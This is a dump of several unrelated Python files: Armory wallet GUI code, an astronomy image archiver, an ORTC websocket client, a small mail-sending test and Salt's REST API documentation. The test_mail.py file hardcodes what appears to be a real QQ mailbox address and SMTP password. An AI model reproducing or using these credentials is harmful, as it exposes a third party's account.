dlgrdy = [0]
nerrors = 0
for wlt in wallets:
if prgAt:
prgAt[0] = i
f = 10000*walletSize[wlt]/totalSize
prgAt[1] = f
i = f +i
self.wltCstStatus = WalletConsistencyCheck(wallets[wlt], prgAt)
if self.wltCstStatus[0] != 0:
self.WltCstError(wallets[wlt], self.wltCstStatus[1], dlgrdy)
while not dlgrdy[0]:
time.sleep(0.01)
nerrors = nerrors +1
prgAt[2] = 1
dlgrdy[0] = 0
while prgAt[2] != 2:
time.sleep(0.1)
if nerrors == 0:
self.emit(SIGNAL('UWCS'), [1, tr('All wallets are consistent'), 10000, dlgrdy])
self.emit(SIGNAL('checkForNegImports'))
else:
while not dlgrdy[0]:
self.emit(SIGNAL('UWCS'), [1, tr('Consistency Check Failed!'), 0, dlgrdy])
time.sleep(1)
self.checkRdyForFix()
def checkRdyForFix(self):
#check BDM first
time.sleep(1)
self.dlgCptWlt.emit(SIGNAL('Show'))
while 1:
if TheBDM.getState() == BDM_SCANNING:
canFix = tr("""
The wallet analysis tool will become available
as soon as Armory is done loading. You can close this
window and it will reappear when ready.""")
self.dlgCptWlt.UpdateCanFix([canFix])
time.sleep(1)
elif TheBDM.getState() == BDM_OFFLINE or \
TheBDM.getState() == BDM_UNINITIALIZED:
TheSDM.setDisabled(True)
CLI_OPTIONS.offline = True
break
else:
break
#check running dialogs
self.dlgCptWlt.emit(SIGNAL('Show'))
runningList = []
while 1:
listchanged = 0
canFix = []
for dlg in runningList[:]:  # iterate over a copy; items may be removed below
if dlg not in runningDialogsList:
runningList.remove(dlg)
listchanged = 1
for dlg in runningDialogsList:
if not isinstance(dlg, DlgCorruptWallet):
if dlg not in runningList:
runningList.append(dlg)
listchanged = 1
if len(runningList):
if listchanged:
canFix.append(tr("""
<b>The following dialogs need to be closed before you can
run the wallet analysis tool:</b>"""))
canFix.extend([str(myobj.windowTitle()) for myobj in runningList])
self.dlgCptWlt.UpdateCanFix(canFix)
time.sleep(0.2)
else:
break
canFix.append('Ready to analyze inconsistent wallets!')
self.dlgCptWlt.UpdateCanFix(canFix, True)
self.dlgCptWlt.exec_()
def checkWallets(self):
nwallets = len(self.walletMap)
if nwallets > 0:
self.prgAt = [0, 0, 0]
self.pbarWalletProgress = QProgressBar()
self.pbarWalletProgress.setMaximum(10000)
self.pbarWalletProgress.setMaximumSize(300, 22)
self.pbarWalletProgress.setStyleSheet('text-align: center; margin-bottom: 2px; margin-left: 10px;')
self.pbarWalletProgress.setFormat(tr('Wallet Consistency Check: %p%'))
self.pbarWalletProgress.setValue(0)
self.statusBar().addWidget(self.pbarWalletProgress)
self.connect(self, SIGNAL('UWCS'), self.UpdateWalletConsistencyStatus)
self.connect(self, SIGNAL('PWCE'), self.PromptWltCstError)
self.CheckWalletConsistency(self.walletMap, self.prgAt, async=True)
self.UpdateConsistencyCheckMessage(async = True)
@AllowAsync
def UpdateConsistencyCheckMessage(self):
while self.prgAt[2] == 0:
self.emit(SIGNAL('UWCS'), [0, self.prgAt[0]])
time.sleep(0.5)
self.emit(SIGNAL('UWCS'), [2])
self.prgAt[2] = 2
def UpdateWalletConsistencyStatus(self, msg):
if msg[0] == 0:
self.pbarWalletProgress.setValue(msg[1])
elif msg[0] == 1:
self.statusBar().showMessage(msg[1], msg[2])
msg[3][0] = 1
else:
self.pbarWalletProgress.hide()
def WltCstError(self, wlt, status, dlgrdy):
self.emit(SIGNAL('PWCE'), dlgrdy, wlt, status)
LOGERROR('Wallet consistency check failed! (%s)', wlt.uniqueIDB58)
def PromptWltCstError(self, dlgrdy, wallet=None, status='', mode=None):
if not self.dlgCptWlt:
self.dlgCptWlt = DlgCorruptWallet(wallet, status, self, self)
dlgrdy[0] = 1
else:
self.dlgCptWlt.addStatus(wallet, status)
if not mode:
self.dlgCptWlt.show()
else:
self.dlgCptWlt.exec_()
#############################################################################
def cppNotifySignal(self, action, arg):
self.emit(SIGNAL('cppNotify'), action, arg)
#############################################################################
def loadNewPage(self):
pageInt = int(self.PageLineEdit.text())
if pageInt == self.mainLedgerCurrentPage:
return
if pageInt < 0 or pageInt > TheBDM.bdv().getWalletsPageCount():
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
return
previousPage = self.mainLedgerCurrentPage
try:
self.mainLedgerCurrentPage = pageInt
self.createCombinedLedger()
except:
self.mainLedgerCurrentPage = previousPage
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
#############################################################################
# System tray notifications require specific code for OS X. We'll handle
# messages here to hide the ugliness.
def showTrayMsg(self, dispTitle, dispText, dispIconType, dispTime):
if not OS_MACOSX:
self.sysTray.showMessage(dispTitle, dispText, dispIconType, dispTime)
else:
if self.notifCtr == ArmoryMac.MacNotificationHandler.BuiltIn:
self.macNotifHdlr.showNotification(dispTitle, dispText)
elif (self.notifCtr == ArmoryMac.MacNotificationHandler.Growl12) or \
(self.notifCtr == ArmoryMac.MacNotificationHandler.Growl13):
self.macNotifHdlr.notifyGrowl(dispTitle, dispText, QIcon(self.iconfile))
#############################################################################
def method_signal(self, method):
method()
#############################################################################
def bdv(self):
return TheBDM.bdv()
############################################
def checkForAlreadyOpen():
import socket
LOGDEBUG('Checking for already open socket...')
try:
sock = socket.create_connection(('127.0.0.1',CLI_OPTIONS.interport), 0.1)
# If we got here (no error), there's already another Armory open
if OS_WINDOWS:
# Windows can be tricky, sometimes holds sockets even after closing
checkForAlreadyOpenError()
LOGERROR('Socket already in use. Sending CLI args to existing proc.')
if CLI_ARGS:
sock.send(CLI_ARGS[0])
sock.close()
LOGERROR('Exiting...')
os._exit(0)
except:
# This is actually the normal condition: we expect this to be the
# first/only instance of Armory and opening the socket will err out
pass
############################################
def checkForAlreadyOpenError():
LOGINFO('Already open error checking')
# Sometimes in Windows, Armory actually isn't open, because it holds
# onto the socket even after it's closed.
armoryExists = []
bitcoindExists = []
aexe = os.path.basename(sys.argv[0])
bexe = 'bitcoind.exe' if OS_WINDOWS else 'bitcoind'
for proc in psutil.process_iter():
if hasattr(proc, '_name'):
pname = str(proc._name)
elif hasattr(proc, 'name'):
pname = str(proc.name)
else:
raise Exception('psutil.process has no known name field!')
if aexe in pname:
LOGINFO('Found armory PID: %d', proc.pid)
armoryExists.append(proc.pid)
if bexe in pname:
LOGINFO('Found bitcoind PID: %d', proc.pid)
if ('testnet' in pname) == USE_TESTNET:
bitcoindExists.append(proc.pid)
if len(armoryExists)>0:
LOGINFO('Not an error! Armory really is open')
return
elif len(bitcoindExists)>0:
# Strange condition where bitcoind doesn't get killed by Armory/guardian
# (I've only seen this happen on windows, though)
LOGERROR('Found zombie bitcoind process...killing it')
for pid in bitcoindExists:
killProcess(pid)
time.sleep(0.5)
raise Exception('Zombie bitcoind killed; no Armory process found')  # caught by caller; proceed with normal startup
############################################
if 1:
import qt4reactor
qt4reactor.install()
if CLI_OPTIONS.interport > 1:
checkForAlreadyOpen()
pixLogo = QPixmap(':/splashlogo.png')
if USE_TESTNET:
pixLogo = QPixmap(':/splashlogo_testnet.png')
SPLASH = ArmorySplashScreen(pixLogo)
SPLASH.setMask(pixLogo.mask())
SPLASH.show()
QAPP.processEvents()
# Will make this customizable
QAPP.setFont(GETFONT('var'))
form = ArmoryMainWindow(splashScreen=SPLASH)
form.show()
SPLASH.finish(form)
from twisted.internet import reactor
def endProgram():
if reactor.threadpool is not None:
reactor.threadpool.stop()
QAPP.quit()
reactor.addSystemEventTrigger('before', 'shutdown', endProgram)
QAPP.setQuitOnLastWindowClosed(True)
reactor.runReturn()
os._exit(QAPP.exec_())
|
archiver.py
|
""" Code to facilitate delayed archiving of FITS files in the images directory """
import os
import time
import queue
import atexit
import shutil
from contextlib import suppress
from threading import Thread
from astropy import units as u
from panoptes.utils.utils import get_quantity_value
from panoptes.utils.time import current_time
from panoptes.pocs.base import PanBase
from huntsman.pocs.utils.logger import get_logger
VALID_EXTENSIONS = (".fits", ".fits.fz")
class Archiver(PanBase):
""" Class to watch the images directory for new files and move them to the archive directory
after enough time has passed.
"""
_valid_extensions = VALID_EXTENSIONS
def __init__(self, images_directory=None, archive_directory=None, delay_interval=None,
sleep_interval=None, status_interval=60, logger=None, *args, **kwargs):
"""
Args:
images_directory (str): The images directory to archive. If None (default), uses
the directories.images config entry.
archive_directory (str): The archive directory. If None (default), uses
the directories.archive config entry.
delay_interval (u.Quantity): The minimum amount of time a file must spend in the
archive queue before it is archived. If None (default), uses the
archiver.delay_time config entry.
sleep_interval (u.Quantity): The amount of time to sleep in between checking for new
files to archive. Ideally this should be longer than delay_interval. If None
(default), uses the archiver.sleep_interval config entry.
status_interval (float, optional): Sleep for this long between status reports. Default
60s.
logger (logger, optional): The logger instance. If not provided, use default Huntsman
logger.
*args, **kwargs: Parsed to PanBase initialiser.
"""
if not logger:
logger = get_logger()
super().__init__(logger=logger, *args, **kwargs)
if images_directory is None:
images_directory = self.get_config("directories.images")
self.images_directory = str(images_directory)
if archive_directory is None:
archive_directory = self.get_config("directories.archive")
self.archive_directory = str(archive_directory)
self.logger.debug(f"Archive directory: {self.archive_directory}")
if delay_interval is None:
delay_interval = self.get_config("archiver.delay_interval")
self.delay_interval = get_quantity_value(delay_interval, u.minute) * u.minute
if sleep_interval is None:
sleep_interval = self.get_config("archiver.sleep_interval")
self.sleep_interval = get_quantity_value(sleep_interval, u.minute) * u.minute
self._status_interval = get_quantity_value(status_interval, u.second)
self._n_archived = 0
self._stop = False
self._archive_queue = queue.Queue()
self._status_thread = Thread(target=self._async_monitor_status)
self._watch_thread = Thread(target=self._async_watch_directory)
self._archive_thread = Thread(target=self._async_archive_files)
self._threads = [self._status_thread, self._watch_thread, self._archive_thread]
atexit.register(self.stop) # This gets called when python is quit
@property
def is_running(self):
return self.status["is_running"]
@property
def status(self):
""" Return a status dictionary.
Returns:
dict: The status dictionary.
"""
status = {"is_running": all([t.is_alive() for t in self._threads]),
"status_thread": self._status_thread.is_alive(),
"watch_thread": self._watch_thread.is_alive(),
"archive_thread": self._status_thread.is_alive(),
"queued": self._archive_queue.qsize(),
"archived": self._n_archived}
return status
def start(self):
""" Start archiving. """
self.logger.info("Starting archiving.")
self._stop = False
for thread in self._threads:
thread.start()
def stop(self, blocking=True):
""" Stop archiving.
Args:
blocking (bool, optional): If True (default), blocks until all threads have joined.
"""
self.logger.info("Stopping archiving.")
self._stop = True
if blocking:
for thread in self._threads:
with suppress(RuntimeError):
thread.join()
def _async_monitor_status(self):
""" Report the status on a regular interval. """
self.logger.debug("Starting status thread.")
while True:
if self._stop:
self.logger.debug("Stopping status thread.")
break
# Get the current status
status = self.status
self.logger.debug(f"Archiver status: {status}")
if not self.is_running:
self.logger.warning("Archiver is not running.")
# Sleep before reporting status again
time.sleep(self._status_interval)
def _async_watch_directory(self):
""" Watch the images directory and add all valid files to the archive queue. """
self.logger.debug("Starting watch thread.")
while True:
if self._stop:
self.logger.debug("Stopping watch thread.")
break
# Loop over filenames and add them to the queue
# Duplicates are taken care of later on
for filename in self._get_filenames_to_archive():
self._archive_queue.put([current_time(), filename])
# Sleep before checking again
time.sleep(self.sleep_interval.to_value(u.second))
def _async_archive_files(self, sleep=10):
""" Archive files that have been in the queue longer than self.delay_interval.
Args:
sleep (float, optional): Sleep for this long while waiting for self.delay_interval to
expire. Default: 10s.
"""
while True:
if self._stop and self._archive_queue.empty():
self.logger.debug("Stopping archive thread.")
break
# Get the oldest file from the queue
try:
track_time, filename = self._archive_queue.get(block=True, timeout=sleep)
except queue.Empty:
continue
# Archive file when it is old enough
while current_time() - track_time < self.delay_interval:
time.sleep(sleep)
with suppress(FileNotFoundError):
self._archive_file(filename)
self._n_archived += 1
# Tell the queue we are done with this file
self._archive_queue.task_done()
def _get_filenames_to_archive(self):
""" Get valid filenames in the images directory to archive.
Returns:
list: The list of filenames to archive.
"""
filenames = []
# Get all the matching filenames in the images directory
for path, _, files in os.walk(self.images_directory):
for name in files:
if any([name.endswith(ext) for ext in self._valid_extensions]):
filenames.append(os.path.join(path, name))
return filenames
def _get_archive_filename(self, filename):
""" Get the archive filename from the original filename.
Args:
filename (str): The filename string.
Returns:
str: The archived file name.
"""
relpath = os.path.relpath(filename, self.images_directory)
return os.path.join(self.archive_directory, relpath)
def _archive_file(self, filename):
""" Archive the file.
Args:
filename (str): The filename string.
"""
if not os.path.exists(filename): # May have already been archived or deleted
self.logger.debug(f"Tried to archive {filename} but it does not exist.")
raise FileNotFoundError
# Get the archived filename
archive_filename = self._get_archive_filename(filename)
# Make sure the archive directory exists
os.makedirs(os.path.dirname(archive_filename), exist_ok=True)
# Move the file to the archive directory
# NOTE: Use copy rather than move so the timestamp gets updated
# This is required for Nifi to pick up the file
self.logger.debug(f"Moving {filename} to {archive_filename}.")
shutil.copy(filename, archive_filename)
# Finally, delete the original
os.remove(filename)
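# A minimal usage sketch (illustrative, not part of the module): it assumes a
# PanBase-compatible config providing the directories.images,
# directories.archive and archiver.* entries referenced above.
if __name__ == "__main__":
    # Archive files 5 minutes after they first appear, checking once a minute.
    archiver = Archiver(delay_interval=5 * u.minute, sleep_interval=1 * u.minute)
    archiver.start()
    try:
        while archiver.is_running:
            time.sleep(10)  # idle; the worker threads do the archiving
    finally:
        archiver.stop()  # atexit would also trigger this on interpreter exit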
|
ortc_extensibility.py
|
import httplib
import re
import random
import string
import time
import websocket
import json
import threading
REST_TIMEOUT = 5
class OrtcError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class Channel(object):
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._name = name
@property
def subscribe_on_reconnecting(self):
return self._subscribe_on_reconnecting
@subscribe_on_reconnecting.setter
def subscribe_on_reconnecting(self, subscribe_on_reconnecting):
self._subscribe_on_reconnecting = subscribe_on_reconnecting
@property
def is_subscribing(self):
return self._is_subscribing
@is_subscribing.setter
def is_subscribing(self, is_subscribing):
self._is_subscribing = is_subscribing
@property
def is_subscribed(self):
return self._is_subscribed
@is_subscribed.setter
def is_subscribed(self, is_subscribed):
self._is_subscribed = is_subscribed
@property
def callback(self):
return self._callback
@callback.setter
def callback(self, callback):
self._callback = callback
def __init__(self, name, subscribe_on_reconnecting, callback):
self._name = name
self._subscribe_on_reconnecting = subscribe_on_reconnecting
self._is_subscribing = False
self._is_subscribed = False
self._callback = callback
class MultiMessage(object):
@property
def total_parts(self):
return self._total_parts
@total_parts.setter
def total_parts(self, total_parts):
self._total_parts = total_parts
@property
def ready_parts(self):
return self._ready_parts
@ready_parts.setter
def ready_parts(self, ready_parts):
self._ready_parts = ready_parts
def __init__(self, total_parts):
self._total_parts = total_parts
self._ready_parts = 0
self._parts = [None]*total_parts
def set_part(self, part_id, part):
if self._parts[part_id] is None:
self._ready_parts += 1
self._parts[part_id] = part
def is_ready(self):
return self._ready_parts == self._total_parts
def get_all_message(self):
return ''.join([str(x) for x in self._parts])
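# Illustrative reassembly of a two-part message (a sketch of how this class
# is driven; the payloads are made up):
#   mm = MultiMessage(2)
#   mm.set_part(1, 'world')
#   mm.set_part(0, 'hello ')
#   mm.is_ready()          # -> True
#   mm.get_all_message()   # -> 'hello world'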
class Private:
@staticmethod
def _get_cluster(host, app_key):
try:
host += '?appkey='+app_key
from urlparse import urlparse
uri = urlparse(host)
conn = httplib.HTTPConnection(uri.netloc, timeout=REST_TIMEOUT)
conn.request("GET", uri.path + "?" + uri.query)
res = conn.getresponse()
if res.status == 200:
rbody = re.search('"(.*)"', res.read()).group(0)
return rbody[1:][:-1]
except StandardError:
return None
@staticmethod
def _call_exception_callback(sender, exception):
if sender.on_exception_callback:
sender.on_exception_callback(sender, exception)
@staticmethod
def _validate_url(url):
return bool(re.compile(r'^\s*(http|https):\/\/(\w+:{0,1}\w*@)?(\S+)(:[0-9]+)?(\/|\/([\w#!:.?+=&%@!\-\/]))?\s*$').match(url))
@staticmethod
def _validate_input(var):
return bool(re.compile(r'^[\w\-:\/\.]*$').match(var))
@staticmethod
def _enum_state(**state):
return type('Enum state', (), state)
@staticmethod
def _remove_slashes(text):
text = text.replace("\\\\\\\"", '"')
text = text.replace("\\\\\\\\", '\\')
text = text.replace("\\\\n", '\n')
return text
@staticmethod
def _check_permission(permissions, channel):
if permissions == {}:
return True, ''
if channel in permissions:
return True, permissions[channel]
if ':' in channel:
if channel[:channel.index(':')]+':*' in permissions:
return True, permissions[channel[:channel.index(':')]+':*']
return False, ''
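# For example (hypothetical permission dicts):
#   Private._check_permission({}, 'any:channel')          -> (True, '')
#   Private._check_permission({'chat:*': 'w'}, 'chat:r1') -> (True, 'w')
#   Private._check_permission({'a': 'r'}, 'b')            -> (False, '')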
@staticmethod
def _rest_post_request(url, body, callback):
def p_thread():
try:
from urlparse import urlparse
uri = urlparse(url)
conn = httplib.HTTPSConnection(uri.netloc, timeout=REST_TIMEOUT)
headers = {}
headers['Content-Length'] = len(body)
conn.request("POST", uri.path, None, headers)
conn.send(body)
res = conn.getresponse()
if res.status==200:
callback(None, res.read())
else:
callback(str(res.status), None)
except Exception, e:
callback(str(e), None)
t = threading.Thread(target=p_thread)
t.setDaemon(True)
t.start()
@staticmethod
def _prepare_server(url, is_cluster, app_key, callback):
server = Private._get_cluster(url, app_key) if is_cluster else url
if server == None:
callback('Error getting server from Cluster', None)
return
server += '/' if not server[-1] == '/' else ''
return server
@staticmethod
def _prepare_server_internal(url, cluster_url, app_key, callback):
if app_key == None:
callback('Please, do connect first', None)
return False, None
server = Private._get_cluster(cluster_url, app_key) if not cluster_url == None else url
if server == None:
callback('Error getting server from Cluster', None)
return False, None
return True, server
|
test_mail.py
|
from multiprocessing import Process
from email.header import Header
from email.mime.text import MIMEText
import smtplib
class MailSender(object):
def __init__(self):
self.mail_server = 'smtp.qq.com'
self.mail_ssl_port = 465
self.mail_form_user = '996846239@qq.com'
self.mail_passwd = 'qxhonddalbdtbajb'
def _send(self, title, content, to_address):
msg = MIMEText(content)
msg['From'] = self.mail_form_user
msg['To'] = ','.join(to_address)
msg['Subject'] = Header(title, "utf-8").encode()
server = smtplib.SMTP_SSL(self.mail_server, self.mail_ssl_port)
server.login(self.mail_form_user, self.mail_passwd)
server.sendmail(self.mail_form_user, to_address, msg.as_string())
server.quit()
def send_email(self, title, content, to_address):
p = Process(target=self._send, args=(title, content, to_address))
p.start()
if __name__ == '__main__':
m = MailSender()
m.send_email('顶村顶', 'x压顶村顶戴模压英雄无用武之地地xx', ['2510233678@qq.com'])
|
app.py
|
# encoding: utf-8
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
